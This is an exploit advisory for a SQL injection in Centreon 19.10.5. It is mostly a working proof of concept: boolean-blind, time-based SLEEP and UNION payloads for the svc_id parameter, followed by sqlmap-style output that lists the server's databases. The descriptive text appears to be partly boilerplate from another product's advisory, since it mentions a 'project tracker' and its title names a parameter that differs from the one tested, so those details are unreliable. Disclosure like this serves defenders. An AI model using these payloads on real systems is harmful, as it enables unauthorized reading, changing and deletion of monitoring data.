Centreon 19.10.5 - 'id' SQL Injection

ID: 102858
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-04-19
# Exploit Author: Basim alabdullah
# Vendor Homepage: https://www.centreon.com
# Software Link: https://download.centreon.com/
# Version: v.19.10.5
# Tested on: Centos 5


 Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.

 Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
 Downloaded by hundreds and thousands of IT professionals worldwide.
 The analysis discovered a time-based blind SQL
 injection vulnerability in the tracker functionality of
 Centreon Monitoring software. A malicious user can inject arbitrary
 SQL commands to the application. The vulnerability lies in the project tracker
 service search functionality; depending on project visibility successful
 exploitation may require user authentication. A successful attack
 can read, modify or delete data from the database or execute arbitrary commands on the underlying system.


 The following version of the Centreon Monitoring was affected by the
 vulnerability; previous versions may be vulnerable as well:
 - Centreon version 19.10.5
[Proof of Concept]
  Parameter: svc_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: hid=15&svc_id=1 OR NOT 5782=5782

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
[12:24:35] [INFO] testing MySQL
[12:24:35] [INFO] confirming MySQL
[12:24:35] [INFO] the back-end DBMS is MySQL
[12:24:35] [INFO] fetching banner
web server operating system: Linux Red Hat
web application technology: Apache 2.4.34, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.1.38-MariaDB'
[12:24:35] [INFO] fetching database names
[12:24:35] [INFO] starting 4 threads
[12:24:35] [INFO] resumed: 'centreon'
[12:24:35] [INFO] resumed: 'test'
[12:24:35] [INFO] resumed: 'centreon_storage'
[12:24:35] [INFO] resumed: 'information_schema'
available databases [4]:                                                                                                                                                               
[*] centreon
[*] centreon_storage
[*] information_schema
[*] test
1-4-2 (www01)